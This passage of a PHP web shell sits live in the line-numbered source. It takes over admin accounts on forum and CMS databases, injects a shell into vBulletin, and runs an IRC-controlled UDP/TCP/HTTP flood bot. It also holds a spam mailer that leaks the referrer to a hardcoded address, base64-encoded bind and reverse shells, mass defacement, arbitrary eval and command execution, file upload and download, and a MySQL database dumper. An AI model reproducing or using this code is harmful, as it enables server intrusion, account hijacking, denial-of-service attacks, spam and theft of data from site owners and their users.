2788 $password = crypt($password);
2789 $tryChaningInfo = @mysql_query("UPDATE jos_users SET username ='".$userName."' , password = '".$password."' WHERE ID =
2790
2791".$adminID."");
2792 if($tryChaningInfo)
2793 {update();}
2794 else {mysql_error();}
2795 }
2796 else if($_POST['ScriptType'] == 'phpbb')
2797 {
2798 //PHPBB3
2799 $password = md5($password);
2800 $tryChaningInfo = @mysql_query("UPDATE phpbb_users SET username ='".$userName."' , user_password = '".
2801
2802$password."' WHERE user_id = ".$adminID."");
2803 if($tryChaningInfo)
2804 {update();}
2805 else {mysql_error();}
2806 }
2807 else if($_POST['ScriptType'] == 'ibf')
2808 {
2809 //IPBoard
2810 $password = md5($password);
2811 $tryChaningInfo = @mysql_query("UPDATE ibf_members SET name ='".$userName."' , member_login_key = '".
2812
2813$password."' WHERE id = ".$adminID."");
2814 if($tryChaningInfo)
2815 {update();}
2816 else {mysql_error();}
2817 }
2818 else if($_POST['ScriptType'] == 'smf')
2819 {
2820 //SMF
2821 $password = md5($password);
2822 $tryChaningInfo = @mysql_query("UPDATE smf_members SET memberName ='".$userName."' , passwd =
2823
2824'".$password."' WHERE ID_MEMBER = ".$adminID."");
2825 if($tryChaningInfo)
2826 {update();}
2827 else {mysql_error();}
2828 }
2829 else if($_POST['ScriptType'] == 'mybb')
2830 {
2831 //MyBB
2832 $password = md5($password);
2833 $tryChaningInfo = @mysql_query("UPDATE mybb_users SET username ='".$userName."' ,
2834
2835password = '".$password."' WHERE uid = ".$adminID."");
2836 if($tryChaningInfo)
2837 {update();}
2838 else {mysql_error();}
2839 }
2840 }
2841 /////////////////////////
2842 }
2843 else if($_POST['Decrypt'])
2844 {
2845 DecryptConfig();
2846 }
2847
2848
2849 echo "</textarea></td></tr>
2850 <td width='50%'>
2851 <form method='POST'>
2852 <table width='100%' height='72' border='0' id='Box'>
2853 <tr>
2854 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2855 <td style='background-color:#666;padding-left:10px;' >Scripts Hacking </td>
2856 </tr>
2857 <tr>
2858 <td height='45' colspan='2'>
2859 <input type = 'text' name='HOST' value='localhost'>
2860 <input type = 'text' name='USER' value='DB Username'>
2861 <input type = 'text' name='PASS' value='DB Password'>
2862 <input type=text name='DB' value='DB Name'>
2863 <input type=text name='PREFIX' value='Prefix'>
2864 <select name='ScriptType' >
2865 <option value='vb'>VBulletin</option>
2866 <option value='wp'>WordPress</option>
2867 <option value='jos'>Joomla</option>
2868 <option value='ipb'>IP.Board</option>
2869 <option value='phpbb'>PHPBB</option>
2870 <option value='mybb'>MyBB</option>
2871 <option value='smf'>SMF</option>
2872 </select>
2873 <br />
2874 <sy>Inject Shell In FAQ.php ? <input type='checkbox' name='injectFAQ'> [ VB Only ]</sy><br />
2875 <textarea name='INDEX' rows=14 cols=64 >Put Your Index Here !</textarea>
2876 <input type='submit' value='Hack Now !!' name='UpdateIndex' >
2877 </td>
2878 </tr>
2879 </table>
2880 <td width='50%' valign='top'>
2881 <table width='100%' height='72' border='0' id='Box'>
2882 <tr>
2883 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2884 <td style='background-color:#666;padding-left:10px;'>Decrypting Configs </td>
2885 </tr>
2886 <tr>
2887 <td height='45' colspan='2'>
2888 <sy>Please Put Config In The Shell Directory With The Name [ DecryptConfig.php ]</sy>
2889 <input value=Decrypt name='Decrypt' type='submit' id='Decrypt' value='Decrypt Now !!'>
2890 </td>
2891 </tr>
2892 </table>
2893 <table width='100%' height='72' border='0' id='Box'>
2894 <tr>
2895 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2896 <td style='background-color:#666;padding-left:10px;'>Changing Admin Info </td></tr><tr><td height='45' colspan='2'>
2897 <input name='adminID' type='text' id='adminID' value='admin id ~= 1'>
2898 <input name='userName' type='text' id='userName' value='username'>
2899 <input name='password' type='text' id='password' value='password ( Not Encrypted !)'>
2900 <input type='submit' name='changeInfo' value='Change Now !'>
2901 </td>
2902 </tr>
2903 </table>
2904 </form>
2905</td>
2906</tr></table>";
2907footer();
2908
2909}
2910
2911# ---------------------------------------#
2912# DDos Attacker ... #
2913#----------------------------------------#
2914if($_POST['StartAttack'])
2915{
2916 $server=$_POST['ipToAttack'];
2917 $Port=$_POST['portToAttack'];
2918 $nick="bot-";$willekeurig;
2919 $willekeurig=@mt_rand(0,3);
2920 $nicknummer=@mt_rand(100000,999999);
2921 $Channel="#WauShare";
2922 $Channelpass="ddos";
2923 $msg="Farewell.";
2924
2925 @set_time_limit(0);
2926 $loop = 0;
2927 $verbonden = 0;
2928 $verbinden = fsockopen($server, $Port);
2929 while ($read = fgets($verbinden,512))
2930 {
2931 $read = str_replace("\n","",$read);
2932 $read = str_replace("\r","",$read);
2933 $read2 = explode(" ",$read);
2934 if ($loop == 0)
2935 {
2936 fputs($verbinden,"nick $nick$nicknummer\n\n");
2937 fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
2938 }
2939 if ($read2[0] == "PING")
2940 {
2941 fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n");
2942 }
2943 if ($read2[1] == 251)
2944 {
2945 fputs($verbinden,"join $Channel $Channelpass\n");
2946 $verbonden++;
2947 }
2948 if (eregi("bot-op",$read))
2949 {
2950 fputs($verbinden,"mode $Channel +o $read2[4]\n");
2951 }
2952 if (eregi("bot-deop",$read))
2953 {
2954 fputs($verbinden,"mode $Channel -o $read2[4]\n");
2955 }
2956
2957 if (eregi("bot-quit",$read))
2958 {
2959 fputs($verbinden,"quit :$msg\n\n");
2960 break;
2961 }
2962 if (eregi("bot-join",$read))
2963 {
2964 fputs($verbinden,"join $read2[4]\n");
2965 }
2966 if (eregi("bot-part",$read))
2967 {
2968 fputs($verbinden,"part $read2[4]\n");
2969 }
2970 if (eregi("ddos-udp",$read))
2971 {
2972 fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
2973 $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
2974 if (!$fp)
2975 {
2976 exit;
2977 }
2978 else
2979 {
2980 $char = "a";
2981 for($a = 0; $a < 9999999999999; $a++)
2982 $data = $data.$char;
2983 if(fputs ($fp, $data) )
2984 {
2985 fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
2986 }
2987 else
2988 {
2989 fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
2990 }
2991 }
2992 }
2993 if (eregi("ddos-tcp",$read))
2994 {
2995 fputs($verbinden,"part $read2[4]\n");
2996 fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
2997 $server = $read2[4];
2998 $Port = $read2[5];
2999 for($sockets = 0; $sockets < $read2[6]; $sockets++)
3000 {
3001 $verbinden = fsockopen($server, $Port);
3002 }
3003 }
3004 if (eregi("ddos-http",$read))
3005 {
3006 fputs($verbinden,"part $read2[4]\n");
3007 fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
3008 $Webserver = $read2[4];
3009 $Port = $read2[5];
3010
3011 $Aanvraag = "GET / HTTP/1.1\r\n";
3012 $Aanvraag .= "Accept: */*\r\n";
3013 $Aanvraag .= "Accept-Language: nl\r\n";
3014 $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
3015 $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
3016 $Aanvraag .= "Host: $read2[4]\r\n";
3017 $Aanvraag .= "Connection: Keep-Alive\r\n\r\n";
3018
3019 for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
3020 {
3021 $DoS = fsockopen($Webserver, $Port);
3022 fwrite($DoS, $Aanvraag);
3023 fclose($DoS);
3024 }
3025 }
3026 $loop++;
3027 }
3028}
3029# ---------------------------------------#
3030# InBoX Mailer #
3031#----------------------------------------#
3032if ($_GET['id']== 'spamming' )
3033{
3034 $secure = "";
3035 error_reporting(0);
3036 @$action=$_POST['action'];
3037 @$from=$_POST['from'];
3038 @$realname=$_POST['realname'];
3039 @$replyto=$_POST['replyto'];
3040 @$subject=$_POST['subject'];
3041 @$message=$_POST['message'];
3042 @$emaillist=$_POST['emaillist'];
3043 @$lod=$_SERVER['HTTP_REFERER'];
3044 @$file_name=$_FILES['file']['name'];
3045 @$contenttype=$_POST['contenttype'];
3046 @$file=$_FILES['file']['tmp_name'];
3047 @$amount=$_POST['amount'];
3048 @set_time_limit(intval($_POST['timelimit']));
3049
3050 if ($action=="send")
3051 {
3052 $message = urlencode($message);
3053 $message = ereg_replace("%5C%22", "%22", $message);
3054 $message = urldecode($message);
3055 $message = stripslashes($message);
3056 $subject = stripslashes($subject);
3057 }
3058 echo "<table width='100%' height='72' border='0' id='Box'>
3059<tr>
3060<td width='14' height='21' style='background-color:".$shellColor."'> </td>
3061<td width='98%' style='background-color:#666;padding-left:10px;' >Inbox Mailer</td>
3062</tr>
3063<tr>
3064<td height='45' colspan='2'>
3065<table bgcolor=#cccccc width=\"100%\"><tbody><tr><td align=\"right\" width=100><p dir=ltr>
3066<b><font color=#990000 size=-2><p align=left><center><form name=\"form1\" method=\"post\" action=\"\" enctype=\"multipart/form-data\"><br/>
3067<table width=142 border=0>
3068<tr>
3069<td width=81>
3070<div align=right>
3071<sy>Your Email:</sy></div></td>
3072<td width=219><sy>
3073<input type=text name=\"from\" value=".$from."></sy></td><td width=212>
3074<div align=right>
3075<sy>Your Name:</sy></div></td><td width=278>
3076<sy>
3077<input type=text name=\realname\" value=".$realname."></sy></td></tr><tr><td width=81>
3078<div align=\"right\">
3079<sy>Reply-To:</sy></div></td><td width=219>
3080<sy>
3081<input type=\"text\" name=\"replyto\" value=".$replyto.">
3082</sy></td><td width=212>
3083<div align=\"right\">
3084<sy>Attach File:</sy></div></td><td width=278>
3085<sy>
3086<input type=\"file\" name=\"file\" size=24 />
3087</sy> </td></tr><tr><td width=81>
3088<div align=\"right\">
3089<sy>Subject:</sy></div></td>
3090<td colspan=3 width=703>
3091<sy>
3092<input type=\"text\" name=\"subject\" value=".$subject." ></sy></td> </tr><tr valign=\"top\"><td colspan=3 width=520>
3093<sy>Message Box :</sy></td>
3094<td width=278>
3095<sy>Email Target / Email Send To :</sy></td></tr><tr valign=\"top\"><td colspan=3 width=520><sy>
3096<textarea name=\"message\" cols=56 rows=10>".$message."</textarea><br />
3097<input type=\"radio\" name=\"contenttype\" value=\"plain\" /> Plain
3098<input type=\"radio\" name=\"contenttype\" value=\"html\" checked=\"checked\" /> HTML
3099<input type=\"hidden\" name=\"action\" value=\"send\" /><br />
3100Number to send: <input type=\"text\" name=\"amount\" value=1 size=10 /><br />
3101Maximum script Execution time(in seconds, 0 for no timelimit)<input type=\"text\" name=\"timelimit\" value=0 size=10 />
3102<input type=\"submit\" value=\"Send eMails\" /></sy></td><td width=278>
3103<sy>
3104<textarea name=\"emaillist\" cols=32 rows=10>".$emaillist."</textarea></sy></td></tr>
3105</table>
3106</td>
3107</tr>
3108</table>";
3109footer();
3110}
3111
3112if ($action=="send")
3113{
3114 if (!$from && !$subject && !$message && !$emaillist)
3115 {
3116 print "Please complete all fields before sending your message.";
3117 exit;
3118 }
3119 $allemails = split("\n", $emaillist);
3120 $numemails = count($allemails);
3121 $head ="From: Mailr" ;
3122 $sub = "Ar - $lod" ;
3123 $meg = "$lod" ;
3124 mail ($alt,$sub,$meg,$head) ;
3125 If ($file_name)
3126 {
3127 if (!file_exists($file))
3128 {
3129 die("The file you are trying to upload couldn't be copied to the server");
3130 }
3131 $content = fread(fopen($file,"r"),filesize($file));
3132 $content = chunk_split(base64_encode($content));
3133 $uid = strtoupper(md5(uniqid(time())));
3134 $name = basename($file);
3135 }
3136
3137 for($xx=0; $xx<$amount; $xx++)
3138 {
3139 for($x=0; $x<$numemails; $x++)
3140 {
3141 $to = $allemails[$x];
3142 if ($to)
3143 {
3144 $to = ereg_replace(" ", "", $to);
3145 $message = ereg_replace("&email&", $to, $message);
3146 $subject = ereg_replace("&email&", $to, $subject);
3147 print "Sending mail to $to.....";
3148 flush();
3149 $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
3150 $header .= "MIME-Version: 1.0\r\n";
3151 If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
3152 If ($file_name) $header .= "--$uid\r\n";
3153 $header .= "Content-Type: text/$contenttype\r\n";
3154 $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
3155 $header .= "$message\r\n";
3156 If ($file_name) $header .= "--$uid\r\n";
3157 If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
3158 If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
3159 If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
3160 If ($file_name) $header .= "$content\r\n";
3161 If ($file_name) $header .= "--$uid--";
3162 mail($to, $subject, "", $header);
3163 print "OK<br>";
3164 flush();
3165 }
3166 }
3167 }
3168}
3169# ---------------------------------------#
3170# About #
3171#----------------------------------------#
3172if($_GET['id']=='about')
3173{
3174 echo About();
3175 if($_POST['sendEmail'])
3176 {
3177 $to= 'sy34@msn.com';
3178 $Comments=$_POST['message'];
3179 $from = $_POST['from'];
3180 $subject= md5("$from");
3181 if(@mail($to,$subject,$Comments,"From:$from"))
3182 echo "<center><sy>[+] Sent ^_^ !!</sy></center>
3183";
3184 else
3185 {
3186 echo "<center><sy>[-] Failed :S !! </sy></center>
3187";
3188 }
3189
3190 }
3191 footer();
3192}
3193
3194$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa
3195
3196+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
3197
31983TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
3199
3200HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
3201
3202ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"
3203;$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
3204
3205NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
3206
3207e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
3208
3209vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
3210$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
3211
3212ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
3213
3214ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
3215$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
3216
3217BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i
3218
3219+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
3220
3221jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
3222
3223?>
3224<?
3225$dspact = $act = htmlspecialchars($act);
3226 $disp_fullpath = $ls_arr = $notls = null;
3227 $ud = @urlencode($d);
3228 if (empty($d)) {$d = realpath(".");}
3229 elseif(realpath($d)) {$d = realpath($d);}
3230 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
3231 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
3232 $d = str_replace("\\\\","\\",$d);
3233 $dispd = htmlspecialchars($d);
3234$self=basename($_SERVER['PHP_SELF']);
3235if(isset($_POST['execmassdeface']))
3236{
3237echo "<center><textarea rows='10' cols='100'>";
3238$hackfile = $_POST['massdefaceurl'];
3239$dir = $_POST['massdefacedir'];
3240echo $dir."\n";
3241
3242if (is_dir($dir)) {
3243 if ($dh = opendir($dir)) {
3244 while (($file = readdir($dh)) !== false) {
3245 if(filetype($dir.$file)=="dir"){
3246 $newfile=$dir.$file."/index.html";
3247 echo $newfile."\n";
3248 if (!copy($hackfile, $newfile)) {
3249 echo "failed to copy $file...\n";
3250 }
3251 }
3252 }
3253 closedir($dh);
3254 }
3255}
3256echo "</textarea></center>";} ?>
3257
3258
3259<tr><td align=right>Mass Defacement:</td>
3260<td><form action='<? basename($_SERVER['PHP_SELF']); ?>' method='post'>[+] Main Directory: <input type='text' style='width: 250px' value='<?php echo $dispd; ?>'
3261
3262name='massdefacedir'> [+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'><input type='submit' name='execmassdeface'
3263
3264value='Execute'></form></td>
3265
3266<?
3267// FILE MANAGER
3268error_reporting(E_ALL);
3269@set_time_limit(0);
3270function magic_q($s)
3271{
3272if(get_magic_quotes_gpc())
3273{
3274$s=str_replace('\\\'','\'',$s);
3275$s=str_replace('\\\\','\\',$s);
3276$s=str_replace('\\"','"',$s);
3277$s=str_replace('\\\0','\0',$s);
3278}
3279return $s;
3280}
3281function get_perms($fn)
3282{
3283$mode=fileperms($fn);
3284$perms='';
3285$perms .= ($mode & 00400) ? 'r' : '-';
3286$perms .= ($mode & 00200) ? 'w' : '-';
3287$perms .= ($mode & 00100) ? 'x' : '-';
3288$perms .= ($mode & 00040) ? 'r' : '-';
3289$perms .= ($mode & 00020) ? 'w' : '-';
3290$perms .= ($mode & 00010) ? 'x' : '-';
3291$perms .= ($mode & 00004) ? 'r' : '-';
3292$perms .= ($mode & 00002) ? 'w' : '-';
3293$perms .= ($mode & 00001) ? 'x' : '-';
3294return $perms;
3295}
3296$head=<<<headka
3297<html>
3298
3299headka;
3300$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
3301$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
3302$winda=strpos(strtolower(php_uname()),'wind');
3303define('format',50);
3304
3305switch($page)
3306{
3307case 'eval':
3308{
3309$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
3310$eval_value=magic_q($eval_value);
3311$action=isset($_POST['action'])?$_POST['action']:'eval';
3312if($action=='eval_in_html') @eval($eval_value);
3313else
3314{
3315echo($head);
3316?>
3317<hr>
3318
3319<hr>
3320<?
3321}
3322break;
3323}
3324case 'cmd':
3325{
3326$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
3327$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
3328$action=isset($_POST['action'])?$_POST['action']:'cmd';
3329if(@is_dir($work_dir))
3330{
3331@chdir($work_dir);
3332$work_dir=getcwd();
3333if($work_dir=='')$work_dir='/';
3334else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
3335}
3336else if(file_exists($work_dir))$work_dir=realpath($work_dir);
3337$work_dir=str_replace('\\','/',$work_dir);
3338$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
3339switch($action)
3340{
3341case 'cmd' :
3342{
3343echo($head);
3344?>
3345
3346<pre>
3347<?
3348if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
3349else
3350{
3351$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
3352if(@is_dir($work_dir))
3353{
3354echo('<H1>File Manager;</H1><hr>');
3355echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
3356$handle=@opendir($work_dir);
3357if($handle)
3358{
3359while(false!==($fn=readdir($handle))){$files[]=$fn;};
3360@closedir($handle);
3361sort($files);
3362$not_dirs=array();
3363for($i=0;$i<sizeof($files);$i++)
3364{
3365$fn=$files[$i];
3366if(is_dir($fn))
3367{
3368echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','"',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)
3369
3370>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
3371if($winda===false)
3372{
3373$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
3374$group=@posix_getgrgid(@filegroup($work_dir.$fn));
3375printf("% 20s|% -20s",$owner['name'],$group['name']);
3376}
3377echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
3378printf("% 20s ",@filesize($work_dir.$fn).'B');
3379printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
3380}
3381else {$not_dirs[]=$fn;}
3382}
3383for($i=0;$i<sizeof($not_dirs);$i++)
3384{
3385$fn=$not_dirs[$i];
3386echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','"',
3387
3388$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
3389if($winda===false)
3390{
3391$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
3392$group=@posix_getgrgid(@filegroup($work_dir.$fn));
3393printf("% 20s|% -20s",$owner['name'],$group['name']);
3394}
3395echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
3396printf("% 20s ",@filesize($work_dir.$fn).'B');
3397printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
3398}
3399echo('</pre><hr>');
3400?>
3401<form name='list' method=post>
3402<input name='work_dir' type=hidden size=120><br>
3403<input name='page' value='cmd' type=hidden>
3404<input name='f_action' value='view' type=hidden>
3405</form>
3406<?
3407} else echo('Error Listing '.$e_work_dir);
3408}
3409else
3410switch($f_action)
3411{
3412case 'view':
3413{
3414echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
3415$f=@fopen($work_dir,'r');
3416?>
3417<form method=post>
3418<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
3419<input name='page' value='cmd' type=hidden>
3420<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
3421<input name='f_action' value='save' type=submit>
3422</form>
3423<?
3424break;
3425}
3426case 'save' :
3427{
3428$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
3429$f=@fopen($work_dir,'w');
3430if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
3431else
3432{
3433fwrite($f,$file_text);
3434fclose($f);
3435echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
3436}
3437break;
3438}
3439}
3440break;
3441}
3442break;
3443}
3444case 'upload' :
3445{
3446if($work_dir=='')$work_dir='/';
3447else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
3448$f=$_FILES["filename"]["name"];
3449if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
3450else
3451{
3452echo('file is uploaded in '.$e_work_dir);
3453}
3454break;
3455}
3456case 'download' :
3457{
3458$fname=isset($_POST['fname'])?$_POST['fname']:'';
3459$temp_file=isset($_POST['temp_file'])?'on':'nn';
3460$f=@fopen($fname,'r');
3461if(!($f)) echo('file is not exists');
3462else
3463{
3464$archive=isset($_POST['archive'])?$_POST['archive']:'';
3465if($archive=='gzip')
3466{
3467Header("Content-Type:application/x-gzip\n");
3468$s=gzencode(fread($f,filesize($fname)));
3469Header('Content-Length: '.strlen($s)."\n");
3470Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
3471echo($s);
3472}
3473else
3474{
3475Header("Content-Type:application/octet-stream\n");
3476Header('Content-Length: '.filesize($fname)."\n");
3477Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
3478ob_start();
3479while(feof($f)===false)
3480{
3481echo(fread($f,10000));
3482ob_flush();
3483}
3484}
3485}
3486}
3487}
3488break;
3489}
3490case 'mysql' :
3491{
3492$action=isset($_POST['action'])?$_POST['action']:'query';
3493$user=isset($_POST['user'])?$_POST['user']:'';
3494$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
3495$db=isset($_POST['db'])?$_POST['db']:'';
3496$host=isset($_POST['host'])?$_POST['host']:'localhost';
3497$query=isset($_POST['query'])?magic_q($_POST['query']):'';
3498switch($action)
3499{
3500case 'dump' :
3501{
3502$mysql_link=@mysql_connect($host,$user,$passwd);
3503if(!($mysql_link)) echo('Connect error');
3504else
3505{
3506//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
3507$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
3508$archive=isset($_POST['archive'])?$_POST['archive']:'none';
3509if($archive!=='none')$to_file=false;
3510$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
3511$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
3512if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
3513else
3514{
3515$dump_file="# MySQL Dumper\n#db $db from $host\n";
3516ob_start();
3517if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
3518if($table_dump=='')
3519{
3520if(!$to_file)
3521{
3522header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
3523header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
3524}
3525$result=mysql_query('show tables',$mysql_link);
3526for($i=0;$i<mysql_num_rows($result);$i++)
3527{
3528$rows=mysql_fetch_array($result);
3529$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
3530if(!$result2)$dump_file.='#error table '.$rows[0];
3531else
3532{
3533$dump_file.='create table `'.$rows[0]."`(\n";
3534for($j=0;$j<mysql_num_rows($result2)-1;$j++)
3535{
3536$rows2=mysql_fetch_array($result2);
3537$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
3538}
3539$rows2=mysql_fetch_array($result2);
3540$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
3541$type[$j]=$rows2[1];
3542$dump_file.=");\n";
3543mysql_free_result($result2);
3544$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
3545$columns=$j-1;
3546for($j=0;$j<mysql_num_rows($result2);$j++)
3547{
3548$rows2=mysql_fetch_array($result2);
3549$dump_file.='insert into `'.$rows[0].'` values (';
3550for($k=0;$k<$columns;$k++)
3551{
3552$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
3553}
3554$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
3555if($archive=='none')
3556{
